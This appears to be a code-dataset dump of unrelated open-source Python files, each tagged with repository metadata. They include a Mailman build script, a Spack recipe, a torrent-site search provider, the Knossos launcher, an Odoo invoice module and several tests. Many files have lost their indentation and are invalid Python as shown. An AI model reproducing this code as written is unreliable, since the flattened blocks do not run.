print >> sys.stderr, 'Could not configure Mailman:'
sys.exit(retcode)
# Make.
retcode = subprocess.call(('make', ), cwd=mailman_source)
if retcode:
print >> sys.stderr, 'Could not make Mailman.'
sys.exit(retcode)
retcode = subprocess.call(('make', 'install'), cwd=mailman_source)
if retcode:
print >> sys.stderr, 'Could not install Mailman.'
sys.exit(retcode)
# Try again to import the package.
try:
import Mailman
except ImportError:
print >> sys.stderr, 'Could not import the Mailman package'
return 1
# Check to see if the site list exists. The output can go to /dev/null
# because we don't really care about it. The site list exists if
# config_list returns a zero exit status, otherwise it doesn't
# (probably). Before we can do this however, we must monkey patch
# Mailman, otherwise mm_cfg.py won't be set up correctly.
monkey_patch(mailman_path, config)
import Mailman.mm_cfg
retcode = subprocess.call(
('./config_list', '-o', '/dev/null',
Mailman.mm_cfg.MAILMAN_SITE_LIST),
cwd=mailman_bin,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if retcode:
addr, password = configure_siteowner(
config.mailman.build_site_list_owner)
# The site list does not yet exist, so create it now.
retcode = subprocess.call(
('./newlist', '--quiet',
'--emailhost=' + build_host_name,
Mailman.mm_cfg.MAILMAN_SITE_LIST,
addr, password),
cwd=mailman_bin)
if retcode:
print >> sys.stderr, 'Could not create site list'
return retcode
retcode = configure_site_list(
mailman_bin, Mailman.mm_cfg.MAILMAN_SITE_LIST)
if retcode:
print >> sys.stderr, 'Could not configure site list'
return retcode
# Create a directory to hold the gzip'd tarballs for the directories of
# deactivated lists.
try:
os.mkdir(os.path.join(Mailman.mm_cfg.VAR_PREFIX, 'backups'))
except OSError as e:
if e.errno != errno.EEXIST:
raise
return 0
def configure_site_list(mailman_bin, site_list_name):
"""Configure the site list.
Currently, the only thing we want to set is to not advertise the
site list.
"""
fd, config_file_name = tempfile.mkstemp()
try:
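        # mkstemp() returns an open fd; we only need the path, so close the
        # fd and rewrite the file by name.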
os.close(fd)
config_file = open(config_file_name, 'w')
try:
print >> config_file, 'advertised = False'
finally:
config_file.close()
return subprocess.call(
('./config_list', '-i', config_file_name, site_list_name),
cwd=mailman_bin)
finally:
os.remove(config_file_name)
def main():
# setting python paths
program = sys.argv[0]
src = 'lib'
here = os.path.dirname(os.path.abspath(program))
srcdir = os.path.join(here, src)
sys.path = [srcdir, here] + basepath
return build_mailman()
if __name__ == '__main__':
return_code = main()
sys.exit(return_code)
| abramhindle/UnnaturalCodeFork | python/testdata/launchpad/buildmailman.py | Python | agpl-3.0 | 7,591 | 0 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RRots(RPackage):
"""Reproducibility-Optimized Test Statistic
Calculates the Reproducibility-Optimized Test Statistic (ROTS) for
differential testing in omics data."""
homepage = "https://bioconductor.org/packages/ROTS"
git = "https://git.bioconductor.org/packages/ROTS.git"
version('1.18.0', commit='1d4e206a8ce68d5a1417ff51c26174ed9d0ba7d2')
version('1.12.0', commit='7e2c96fd8fd36710321498745f24cc6b59ac02f0')
version('1.10.1', commit='1733d3f868cef4d81af6edfc102221d80793937b')
version('1.8.0', commit='02e3c6455bb1afe7c4cc59ad6d4d8bae7b01428b')
version('1.6.0', commit='3567ac1142ba97770b701ee8e5f9e3e6c781bd56')
version('1.4.0', commit='2e656514a4bf5a837ee6e14ce9b28a61dab955e7')
depends_on('r@3.3:', type=('build', 'run'))
depends_on('r-rcpp', type=('build', 'run'))
depends_on('r-biobase', type=('build', 'run'))
| LLNL/spack | var/spack/repos/builtin/packages/r-rots/package.py | Python | lgpl-2.1 | 1,117 | 0.000895 |
# -*- coding: utf-8 -*-
#
# Cherokee-admin
#
# Authors:
# Alvaro Lopez Ortega <alvaro@alobbs.com>
#
# Copyright (C) 2001-2010 Alvaro Lopez Ortega
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public
# License as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
from consts import *
from configured import *
OWS_STATIC = 'http://cherokee-market.com'
OWS_APPS = 'http://www.octality.com/api/v%s/open/market/apps/' %(OWS_API_VERSION)
OWS_APPS_AUTH = 'http://www.octality.com/api/v%s/market/apps/' %(OWS_API_VERSION)
OWS_APPS_INSTALL = 'http://www.octality.com/api/v%s/market/install/' %(OWS_API_VERSION)
OWS_DEBUG = True
URL_MAIN = '/market'
URL_APP = '/market/app'
URL_SEARCH = '/market/search'
URL_SEARCH_APPLY = '/market/search/apply'
URL_CATEGORY = '/market/category'
URL_REVIEW = '/market/review'
| chetan/cherokee | admin/market/ows_consts.py | Python | gpl-2.0 | 1,407 | 0.012082 |
# coding=utf-8
# Author: Mr_Orange <mr_orange@hotmail.it>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
from __future__ import with_statement
import traceback
import re
import datetime
import xmltodict
import sickbeard
from sickbeard.providers import generic
from sickbeard.common import Quality
from sickbeard import logger
from sickbeard import tvcache
from sickbeard import helpers
from sickbeard import db
from sickbeard import classes
from sickbeard.show_name_helpers import allPossibleShowNames, sanitizeSceneName
class KATProvider(generic.TorrentProvider):
def __init__(self):
generic.TorrentProvider.__init__(self, "KickAssTorrents")
self.supportsBacklog = True
self.public = True
self.enabled = False
self.confirmed = True
self.ratio = None
self.minseed = None
self.minleech = None
self.cache = KATCache(self)
self.urls = {
'base_url': 'https://kat.cr/',
'search': 'https://kat.cr/usearch/',
'rss': 'https://kat.cr/tv/',
}
self.url = self.urls['base_url']
self.search_params = {
'q': '',
'field': 'seeders',
'sorder': 'desc',
'rss': 1,
'category': 'tv'
}
def isEnabled(self):
return self.enabled
def imageName(self):
return 'kat.png'
def _get_season_search_strings(self, ep_obj):
search_string = {'Season': []}
for show_name in set(allPossibleShowNames(ep_obj.show)):
ep_string = sanitizeSceneName(show_name) + ' '
if ep_obj.show.air_by_date or ep_obj.show.sports:
ep_string += str(ep_obj.airdate).split('-')[0]
elif ep_obj.show.anime:
ep_string += "%02d" % ep_obj.scene_absolute_number
else:
ep_string = '%s S%02d -S%02dE category:tv' % (sanitizeSceneName(show_name), ep_obj.scene_season, ep_obj.scene_season) #1) showName SXX -SXXE
search_string['Season'].append(ep_string)
ep_string = '%s "Season %d" -Ep* category:tv' % (sanitizeSceneName(show_name), ep_obj.scene_season) # 2) showName "Season X"
search_string['Season'].append(ep_string)
return [search_string]
def _get_episode_search_strings(self, ep_obj, add_string=''):
search_string = {'Episode': []}
for show_name in set(allPossibleShowNames(ep_obj.show)):
ep_string = sanitizeSceneName(show_name) + ' '
if ep_obj.show.air_by_date:
ep_string += str(ep_obj.airdate).replace('-', ' ')
elif ep_obj.show.sports:
ep_string += str(ep_obj.airdate).replace('-', ' ') + '|' + ep_obj.airdate.strftime('%b')
elif ep_obj.show.anime:
ep_string += "%02d" % ep_obj.scene_absolute_number
else:
ep_string += sickbeard.config.naming_ep_type[2] % {'seasonnumber': ep_obj.scene_season,
'episodenumber': ep_obj.scene_episode} + '|' + \
sickbeard.config.naming_ep_type[0] % {'seasonnumber': ep_obj.scene_season,
'episodenumber': ep_obj.scene_episode}
if add_string:
ep_string += ' ' + add_string
search_string['Episode'].append(re.sub(r'\s+', ' ', ep_string.strip()))
return [search_string]
def _get_size(self, item):
#pylint: disable=W0612
title, url, info_hash, seeders, leechers, size, pubdate = item
return size or -1
def _doSearch(self, search_strings, search_mode='eponly', epcount=0, age=0, epObj=None):
results = []
items = {'Season': [], 'Episode': [], 'RSS': []}
for mode in search_strings.keys():
for search_string in search_strings[mode]:
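                # RSS polls sort by time added; manual searches sort by seeders.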
self.search_params.update({'q': search_string, 'field': ('seeders', 'time_add')[mode == 'RSS']})
logger.log(u"Search string: %s" % unicode(self.search_params), logger.DEBUG)
try:
data = self.getURL(self.urls[('search', 'rss')[mode == 'RSS']], params=self.search_params)
if not data:
continue
entries = xmltodict.parse(data)
if not all([entries, 'rss' in entries, 'channel' in entries['rss'], 'item' in entries['rss']['channel']]):
continue
for item in entries['rss']['channel']['item']:
try:
title = item['title']
# Use the torcache link kat provides,
# unless it is not torcache or we are not using blackhole
# because we want to use magnets if connecting direct to client
# so that proxies work.
url = item['enclosure']['@url']
if sickbeard.TORRENT_METHOD != "blackhole" or 'torcache' not in url:
url = item['torrent:magnetURI']
seeders = int(item['torrent:seeds'])
leechers = int(item['torrent:peers'])
verified = bool(int(item['torrent:verified']) or 0)
size = int(item['torrent:contentLength'])
info_hash = item['torrent:infoHash']
#link = item['link']
except (AttributeError, TypeError, KeyError):
continue
                        # Don't let RSS add items with no seeders either -.-
if not seeders or seeders < self.minseed or leechers < self.minleech:
logger.log(u"Discarding torrent because it doesn't meet the minimum seeders or leechers: {0} (S:{1} L:{2})".format(title, seeders, leechers), logger.DEBUG)
continue
if self.confirmed and not verified:
logger.log(u"KAT Provider found result " + title + " but that doesn't seem like a verified result so I'm ignoring it", logger.DEBUG)
continue
if not title or not url:
continue
try:
pubdate = datetime.datetime.strptime(item['pubDate'], '%a, %d %b %Y %H:%M:%S +0000')
except Exception:
pubdate = datetime.datetime.today()
item = title, url, info_hash, seeders, leechers, size, pubdate
items[mode].append(item)
except Exception:
logger.log(u"Failed to parsing " + self.name + " Traceback: " + traceback.format_exc(),
logger.WARNING)
#For each search mode sort all the items by seeders
items[mode].sort(key=lambda tup: tup[3], reverse=True)
results += items[mode]
return results
def _get_title_and_url(self, item):
#pylint: disable=W0612
title, url, info_hash, seeders, leechers, size, pubdate = item
if title:
title = self._clean_title_from_provider(title)
if url:
url = url.replace('&', '&')
return (title, url)
def findPropers(self, search_date=datetime.datetime.today()-datetime.timedelta(days=1)):
results = []
myDB = db.DBConnection()
sqlResults = myDB.select(
'SELECT s.show_name, e.showid, e.season, e.episode, e.status, e.airdate, s.indexer FROM tv_episodes AS e' +
' INNER JOIN tv_shows AS s ON (e.showid = s.indexer_id)' +
' WHERE e.airdate >= ' + str(search_date.toordinal()) +
' AND (e.status IN (' + ','.join([str(x) for x in Quality.DOWNLOADED]) + ')' +
' OR (e.status IN (' + ','.join([str(x) for x in Quality.SNATCHED]) + ')))'
)
for sqlshow in sqlResults or []:
show = helpers.findCertainShow(sickbeard.showList, int(sqlshow["showid"]))
if show:
curEp = show.getEpisode(int(sqlshow["season"]), int(sqlshow["episode"]))
searchStrings = self._get_episode_search_strings(curEp, add_string='PROPER|REPACK')
for item in self._doSearch(searchStrings):
title, url = self._get_title_and_url(item)
pubdate = item[6]
results.append(classes.Proper(title, url, pubdate, show))
return results
def seedRatio(self):
return self.ratio
class KATCache(tvcache.TVCache):
def __init__(self, provider_obj):
tvcache.TVCache.__init__(self, provider_obj)
        # only poll KickAss every 20 minutes max
self.minTime = 20
def _getRSSData(self):
search_params = {'RSS': ['']}
return {'entries': self.provider._doSearch(search_params)}
provider = KATProvider()
| elit3ge/SickRage | sickbeard/providers/kat.py | Python | gpl-3.0 | 9,861 | 0.003752 |
PRIORITY_EMAIL_NOW = 0
PRIORITY_HIGH = 1
PRIORITY_NORMAL = 3
PRIORITY_LOW = 5
RESULT_SENT = 0
RESULT_SKIPPED = 1
RESULT_FAILED = 2
PRIORITIES = {
'now': PRIORITY_EMAIL_NOW,
'high': PRIORITY_HIGH,
'normal': PRIORITY_NORMAL,
'low': PRIORITY_LOW,
}
PRIORITY_HEADER = 'X-Mail-Queue-Priority'
try:
from django.core.mail import get_connection
EMAIL_BACKEND_SUPPORT = True
except ImportError:
# Django version < 1.2
EMAIL_BACKEND_SUPPORT = False
| mfwarren/django-mailer-2 | django_mailer/constants.py | Python | mit | 475 | 0 |
## Copyright 2017 Knossos authors, see NOTICE file
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
from __future__ import absolute_import, print_function
import sys
import os
import logging
import subprocess
import time
import json
import traceback
import ssl
import six
from six.moves.urllib import parse as urlparse
logging.basicConfig(level=logging.DEBUG, format='%(levelname)s:%(threadName)s:%(module)s.%(funcName)s: %(message)s')
# We have to be in the correct directory *before* we import clibs so we're going to do this as early as possible.
if hasattr(sys, 'frozen'):
if hasattr(sys, '_MEIPASS'):
os.chdir(sys._MEIPASS)
else:
os.chdir(os.path.dirname(sys.executable))
else:
my_path = os.path.dirname(__file__)
if my_path != '':
os.chdir(my_path)
from . import uhf
uhf(__name__)
from . import center
# Initialize the FileHandler early to capture all log messages.
if not os.path.isdir(center.settings_path):
os.makedirs(center.settings_path)
# We truncate the log file on every start to avoid filling the user's disk with useless data.
log_path = os.path.join(center.settings_path, 'log.txt')
try:
if os.path.isfile(log_path):
os.unlink(log_path)
except Exception:
# This will only be visible if the user is running a console version.
logging.exception('The log is in use by someone!')
else:
handler = logging.FileHandler(log_path, 'w')
handler.setFormatter(logging.Formatter('%(levelname)s:%(threadName)s:%(module)s.%(funcName)s: %(message)s'))
handler.setLevel(logging.DEBUG)
logging.getLogger().addHandler(handler)
if not center.DEBUG:
logging.getLogger().setLevel(logging.INFO)
if six.PY2:
from . import py2_compat # noqa
from .qt import QtCore, QtGui, QtWidgets, variant as qt_variant
from . import util, ipc, auto_fetch
app = None
ipc_conn = None
translate = QtCore.QCoreApplication.translate
def my_excepthook(type, value, tb):
try:
# NOTE: This can fail (for some reason) in traceback.print_exception.
logging.error('UNCAUGHT EXCEPTION!', exc_info=(type, value, tb))
except Exception:
logging.error('UNCAUGHT EXCEPTION!\n%s%s: %s' % (''.join(traceback.format_tb(tb)), type.__name__, value))
msg = translate('launcher', 'A critical error occurred! Knossos might not work correctly until you restart it.')
if center.raven:
msg += '\n' + translate('launcher', 'The error has been reported and will hopefully be fixed soon.')
msg += '\n' + translate('launcher', 'If you want to help, report this bug on our Discord channel, ' +
'in the HLP thread or on GitHub. Just click a button below to open the relevant page.')
try:
box = QtWidgets.QMessageBox(QtWidgets.QMessageBox.Critical, 'Knossos', msg, QtWidgets.QMessageBox.Ok)
discord = box.addButton('Open Discord', QtWidgets.QMessageBox.ActionRole)
hlp = box.addButton('Open HLP Thread', QtWidgets.QMessageBox.ActionRole)
github = box.addButton('Open GitHub Issues', QtWidgets.QMessageBox.ActionRole)
box.exec_()
choice = box.clickedButton()
url = None
if choice == discord:
url = 'https://discord.gg/qfReB8t'
elif choice == hlp:
url = 'https://www.hard-light.net/forums/index.php?topic=94068.0'
elif choice == github:
url = 'https://github.com/ngld/knossos/issues'
if url:
QtGui.QDesktopServices.openUrl(QtCore.QUrl(url))
except Exception:
pass
def get_cmd(args=[]):
if hasattr(sys, 'frozen'):
my_path = [os.path.abspath(sys.executable)]
else:
my_path = [os.path.abspath(sys.executable), os.path.abspath('__main__.py')]
return my_path + args
def get_file_path(name):
if hasattr(sys, 'frozen') or os.path.isdir('data'):
return os.path.join('data', name)
else:
from pkg_resources import resource_filename
return resource_filename(__package__, name)
def load_settings():
spath = os.path.join(center.settings_path, 'settings.json')
settings = center.settings
if os.path.exists(spath):
try:
with open(spath, 'r') as stream:
settings.update(json.load(stream))
except Exception:
logging.exception('Failed to load settings from "%s"!', spath)
# Migration
if 's_version' not in settings:
settings['s_version'] = 0
if settings['s_version'] < 6:
for name in ('mods', 'installed_mods', 'repos', 'nebula_link', 'nebula_web'):
if name in settings:
del settings[name]
settings['s_version'] = 6
else:
# Most recent settings version
settings['s_version'] = 6
if settings['hash_cache'] is not None:
util.HASH_CACHE = settings['hash_cache']
if settings['use_raven']:
util.enable_raven()
if settings['repos_override']:
center.REPOS = settings['repos_override']
if settings['api_override']:
center.API = settings['api_override']
if settings['web_override']:
center.WEB = settings['web_override']
if settings['debug_log']:
logging.getLogger().setLevel(logging.DEBUG)
util.ensure_tempdir()
return settings
def run_knossos():
global app
from .windows import HellWindow
center.app = app
center.main_win = HellWindow()
app.processEvents()
if sys.platform.startswith('win') and os.path.isfile('7z.exe'):
util.SEVEN_PATH = os.path.abspath('7z.exe')
elif sys.platform == 'darwin' and os.path.isfile('7z'):
util.SEVEN_PATH = os.path.abspath('7z')
translate = QtCore.QCoreApplication.translate
if not util.test_7z():
QtWidgets.QMessageBox.critical(None, 'Knossos', translate(
'launcher', 'I can\'t find "7z"! Please install it and run this program again.'))
return
util.DL_POOL.set_capacity(center.settings['max_downloads'])
if center.settings['download_bandwidth'] > 0.0:
util.SPEED_LIMIT_BUCKET.set_rate(center.settings['download_bandwidth'])
from . import repo, progress, integration
center.installed = repo.InstalledRepo()
center.pmaster = progress.Master()
center.pmaster.start_workers(10)
center.mods = repo.Repo()
center.auto_fetcher = auto_fetch.AutoFetcher()
# This has to run before we can load any mods!
repo.CPU_INFO = util.get_cpuinfo()
integration.init()
mod_db = os.path.join(center.settings_path, 'mods.json')
if os.path.isfile(mod_db):
try:
center.mods.load_json(mod_db)
except Exception:
logging.exception('Failed to load local mod list!')
center.mods.clear()
center.main_win.start_init()
app.exec_()
center.save_settings()
ipc.shutdown()
def handle_ipc_error():
global app, ipc_conn
logging.warning('Failed to connect to main process!')
if ipc_conn is not None:
ipc_conn.clean()
ipc_conn = None
def scheme_handler(link):
global app, ipc_conn
if not link.startswith(('fs2://', 'fso://')):
# NOTE: fs2:// is deprecated, we don't tell anyone about it.
QtWidgets.QMessageBox.critical(None, 'Knossos',
translate('launcher', 'I don\'t know how to handle "%s"! I only know fso:// .') % (link))
app.quit()
return True
link = urlparse.unquote(link.strip()).split('/')
if len(link) < 3:
QtWidgets.QMessageBox.critical(None, 'Knossos', translate('launcher', 'Not enough arguments!'))
app.quit()
return True
if not ipc_conn.server_exists():
# Launch the program.
subprocess.Popen(get_cmd())
# Wait for the program...
start = time.time()
while not ipc_conn.server_exists():
if time.time() - start > 20:
# That's too long!
QtWidgets.QMessageBox.critical(None, 'Knossos', translate('launcher', 'Failed to start server!'))
app.quit()
return True
time.sleep(0.3)
try:
ipc_conn.open_connection(handle_ipc_error)
except Exception:
logging.exception('Failed to connect to myself!')
handle_ipc_error()
return False
if not ipc_conn:
return False
ipc_conn.send_message(json.dumps(link[2:]))
ipc_conn.close(True)
app.quit()
return True
def main():
global ipc_conn, app
# Default to replacing errors when de/encoding.
import codecs
codecs.register_error('strict', codecs.replace_errors)
codecs.register_error('really_strict', codecs.strict_errors)
sys.excepthook = my_excepthook
# The version file is only read in dev builds.
if center.VERSION.endswith('-dev'):
if 'KN_VERSION' in os.environ:
center.VERSION = os.environ['KN_VERSION'].strip()
else:
try:
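                # Append the short commit hash from the local git checkout to
                # the dev version string.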
with open('../.git/HEAD') as stream:
ref = stream.read().strip().split(':')
assert ref[0] == 'ref'
with open('../.git/' + ref[1].strip()) as stream:
center.VERSION += '+' + stream.read()[:7]
except Exception:
pass
logging.info('Running Knossos %s on %s and Python %s.', center.VERSION, qt_variant, sys.version)
logging.info('OpenSSL version: %s', ssl.OPENSSL_VERSION)
app = QtWidgets.QApplication([])
res_path = get_file_path('resources.rcc')
logging.debug('Loading resources from %s.', res_path)
QtCore.QResource.registerResource(res_path)
logging.debug('Loading settings...')
load_settings()
trans = QtCore.QTranslator()
if center.settings['language']:
lang = center.settings['language']
else:
lang = QtCore.QLocale()
if trans.load(lang, 'knossos', '_', get_file_path(''), '.etak'):
app.installTranslator(trans)
else:
del trans
app.setWindowIcon(QtGui.QIcon(':/hlp.png'))
ipc_conn = ipc.IPCComm(center.settings_path)
if len(sys.argv) > 1:
if sys.argv[1] == '--finish-update':
updater = sys.argv[2]
if not os.path.isfile(updater):
logging.error('The update finished but where is the installer?! It\'s not where it\'s supposed to be! (%s)', updater)
else:
tries = 3
while tries > 0:
try:
# Clean up
os.unlink(updater)
except Exception:
logging.exception('Failed to remove updater! (%s)' % updater)
if os.path.isfile(updater):
time.sleep(0.3)
tries -= 1
else:
break
# Delete the temporary directory.
if os.path.basename(updater) == 'knossos_updater.exe':
try:
os.rmdir(os.path.dirname(updater))
except Exception:
logging.exception('Failed to remove the updater\'s temporary directory.')
elif sys.argv[1].startswith('-psn_'):
# This parameter is automatically passed by Finder on macOS, ignore it.
pass
else:
tries = 3
while tries > 0:
if scheme_handler(sys.argv[1]):
break
tries -= 1
ipc_conn = ipc.IPCComm(center.settings_path)
if tries == 0:
sys.exit(1)
return
elif ipc_conn.server_exists() and scheme_handler('fso://focus'):
return
del ipc_conn
try:
run_knossos()
except Exception:
        logging.exception('Uncaught exception! Quitting...')
# Try to tell the user
QtWidgets.QMessageBox.critical(None, 'Knossos',
translate('launcher', 'I encountered a fatal error.\nI\'m sorry but I\'m going to crash now...'))
| MjnMixael/knossos | knossos/launcher.py | Python | apache-2.0 | 12,595 | 0.003335 |
#!/usr/bin/env python
# coding=utf-8
import pprint
import csv
import click
import requests
import datetime as datetime
from datetime import date
from xml.etree import ElementTree as ET
import os
# from random import sample
import random
import json
# import logging
import subprocess
import glob
import time
@click.command()
@click.option('--days', default=10, type=int)
@click.option('--span', default=5, type=int)
# @click.option('--duration', default=3, type=int)
# @click.option('--days', default=1, type=int)
def ctripmultiplus(days, span):
start_days = days
for i in range(span):
subprocess.call(['python', 'ctripplus.py', '--days', str(start_days + i*10)])
for i in range(3):
print('sleeping..')
time.sleep(1)
# newest = max(glob.iglob('output_Search_item_hr_*.csv'), key=os.path.getctime)
# subprocess.call(['python', 'sendmail.py', '--filename', 'output_hotel_ref_*.csv', '--title', 'Ctrip_hotel_ref'])
if __name__ == '__main__':
ctripmultiplus() | Fatman13/gta_swarm | ctripmultiplus.py | Python | mit | 1,017 | 0.013766 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cases', '0021_migrate_case_contacts'),
('msgs', '0008_messageaction'),
]
operations = [
migrations.RemoveField(
model_name='messageaction',
name='created_by',
),
migrations.RemoveField(
model_name='messageaction',
name='label',
),
migrations.RemoveField(
model_name='messageaction',
name='org',
),
migrations.DeleteModel(
name='MessageAction',
),
]
| xkmato/casepro | casepro/cases/migrations/0022_delete_mesageaction.py | Python | bsd-3-clause | 697 | 0 |
# Copyright Iris contributors
#
# This file is part of Iris and is released under the LGPL license.
# See COPYING and COPYING.LESSER in the root of the repository for full
# licensing details.
"""Unit tests for the :func:`iris.analysis.maths.divide` function."""
# Import iris.tests first so that some things can be initialised before
# importing anything else.
import iris.tests as tests
import numpy as np
import operator
from iris.analysis.maths import divide
from iris.cube import Cube
from iris.tests.unit.analysis.maths import (
CubeArithmeticBroadcastingTestMixin,
CubeArithmeticMaskingTestMixin,
CubeArithmeticCoordsTest,
)
@tests.skip_data
@tests.iristest_timing_decorator
class TestBroadcasting(
tests.IrisTest_nometa, CubeArithmeticBroadcastingTestMixin
):
@property
def data_op(self):
return operator.truediv
@property
def cube_func(self):
return divide
@tests.iristest_timing_decorator
class TestMasking(tests.IrisTest_nometa, CubeArithmeticMaskingTestMixin):
@property
def data_op(self):
return operator.truediv
@property
def cube_func(self):
return divide
def test_unmasked_div_zero(self):
# Ensure cube behaviour matches numpy operator behaviour for the
# handling of arrays containing 0.
dat_a = np.array([0.0, 0.0, 0.0, 0.0])
dat_b = np.array([2.0, 2.0, 2.0, 2.0])
cube_a = Cube(dat_a)
cube_b = Cube(dat_b)
com = self.data_op(dat_b, dat_a)
res = self.cube_func(cube_b, cube_a).data
self.assertArrayEqual(com, res)
def test_masked_div_zero(self):
# Ensure cube behaviour matches numpy operator behaviour for the
# handling of arrays containing 0.
dat_a = np.ma.array([0.0, 0.0, 0.0, 0.0], mask=False)
dat_b = np.ma.array([2.0, 2.0, 2.0, 2.0], mask=False)
cube_a = Cube(dat_a)
cube_b = Cube(dat_b)
com = self.data_op(dat_b, dat_a)
res = self.cube_func(cube_b, cube_a).data
self.assertMaskedArrayEqual(com, res, strict=True)
class TestCoordMatch(CubeArithmeticCoordsTest):
def test_no_match(self):
cube1, cube2 = self.SetUpNonMatching()
with self.assertRaises(ValueError):
divide(cube1, cube2)
def test_reversed_points(self):
cube1, cube2 = self.SetUpReversed()
with self.assertRaises(ValueError):
divide(cube1, cube2)
if __name__ == "__main__":
tests.main()
| pp-mo/iris | lib/iris/tests/unit/analysis/maths/test_divide.py | Python | lgpl-3.0 | 2,496 | 0 |
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# vim:set shiftwidth=4 tabstop=4 expandtab textwidth=79:
import os
from setuptools import setup, find_packages
def get_version():
basedir = os.path.dirname(__file__)
with open(os.path.join(basedir, 'instapush/version.py')) as f:
locals = {}
exec(f.read(), locals)
        if 'VERSION' in locals:
            return locals['VERSION']
    raise RuntimeError('No version info found.')
setup(
name='instapush',
version = get_version(),
keywords = ('instapush', 'tools'),
description = 'a python wrapper for instapush',
license = 'MIT License',
url = 'https://github.com/adamwen829/instapush-py',
author = 'Adam Wen',
author_email = 'adamwen829@gmail.com',
packages = find_packages(),
include_package_data = True,
platforms = 'any',
install_requires = ['requests']
)
| adamwen829/instapush-py | setup.py | Python | mit | 894 | 0.025727 |
# -*- coding: utf-8 -*-
# © 2013-2016 Akretion (Alexis de Lattre <alexis.delattre@akretion.com>)
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo import models, fields, api, _
from odoo.exceptions import ValidationError, UserError
class AccountInvoiceLine(models.Model):
_inherit = 'account.invoice.line'
start_date = fields.Date('Start Date')
end_date = fields.Date('End Date')
must_have_dates = fields.Boolean(
related='product_id.must_have_dates', readonly=True)
@api.multi
@api.constrains('start_date', 'end_date')
def _check_start_end_dates(self):
for invline in self:
if invline.start_date and not invline.end_date:
raise ValidationError(
_("Missing End Date for invoice line with "
"Description '%s'.")
% (invline.name))
if invline.end_date and not invline.start_date:
raise ValidationError(
_("Missing Start Date for invoice line with "
"Description '%s'.")
% (invline.name))
if invline.end_date and invline.start_date and \
invline.start_date > invline.end_date:
raise ValidationError(
_("Start Date should be before or be the same as "
"End Date for invoice line with Description '%s'.")
% (invline.name))
# Note : we can't check invline.product_id.must_have_dates
# have start_date and end_date here, because it would
# block automatic invoice generation/import. So we do the check
# upon validation of the invoice (see below the function
# action_move_create)
class AccountInvoice(models.Model):
_inherit = 'account.invoice'
def inv_line_characteristic_hashcode(self, invoice_line):
"""Add start and end dates to hashcode used when the option "Group
Invoice Lines" is active on the Account Journal"""
code = super(AccountInvoice, self).inv_line_characteristic_hashcode(
invoice_line)
hashcode = '%s-%s-%s' % (
code,
invoice_line.get('start_date', 'False'),
invoice_line.get('end_date', 'False'),
)
return hashcode
@api.model
def line_get_convert(self, line, part):
"""Copy from invoice to move lines"""
res = super(AccountInvoice, self).line_get_convert(line, part)
res['start_date'] = line.get('start_date', False)
res['end_date'] = line.get('end_date', False)
return res
@api.model
def invoice_line_move_line_get(self):
"""Copy from invoice line to move lines"""
res = super(AccountInvoice, self).invoice_line_move_line_get()
ailo = self.env['account.invoice.line']
for move_line_dict in res:
iline = ailo.browse(move_line_dict['invl_id'])
move_line_dict['start_date'] = iline.start_date
move_line_dict['end_date'] = iline.end_date
return res
@api.multi
def action_move_create(self):
"""Check that products with must_have_dates=True have
Start and End Dates"""
for invoice in self:
for iline in invoice.invoice_line_ids:
if iline.product_id and iline.product_id.must_have_dates:
if not iline.start_date or not iline.end_date:
raise UserError(_(
"Missing Start Date and End Date for invoice "
"line with Product '%s' which has the "
"property 'Must Have Start and End Dates'.")
% (iline.product_id.name))
return super(AccountInvoice, self).action_move_create()
| stellaf/sales_rental | account_invoice_start_end_dates/models/account_invoice.py | Python | gpl-3.0 | 3,875 | 0 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
if sys.version_info >= (3, 0):
from unittest.mock import patch
else:
from mock import patch
from pyfakefs import fake_filesystem_unittest
from shellfoundry.utilities.config.config_context import ConfigContext
from shellfoundry.utilities.config.config_file_creation import ConfigFileCreation
from shellfoundry.utilities.config.config_record import ConfigRecord
class TestConfigRecord(fake_filesystem_unittest.TestCase):
def setUp(self):
self.setUpPyfakefs()
@patch(
"shellfoundry.utilities.config.config_file_creation.open", create=True
) # create=True to overcome the issue with builtin methods default fallback
@patch("shellfoundry.utilities.config.config_file_creation.click.echo")
def test_failed_to_create_config_file(self, echo_mock, open_mock):
# Arrange
cfg_path = "/quali/shellfoundry/global_config.yml"
open_mock.side_effect = [
IOError("Failed to create the file, maybe it is already exists")
]
# Act
cfg_creation = ConfigFileCreation()
# Assert
self.assertRaises(IOError, cfg_creation.create, cfg_path)
echo_mock.assert_any_call(
"Failed to create the file, maybe it is already exists"
)
echo_mock.assert_any_call("Failed to create config file")
@patch("shellfoundry.utilities.config.config_file_creation.open", create=True)
@patch("shellfoundry.utilities.config.config_file_creation.click.echo")
    def test_failed_to_create_config_file_due_to_already_exists_no_error_is_raised(
self, echo_mock, open_mock
):
# Arrange
cfg_path = "/quali/shellfoundry/global_config.yml"
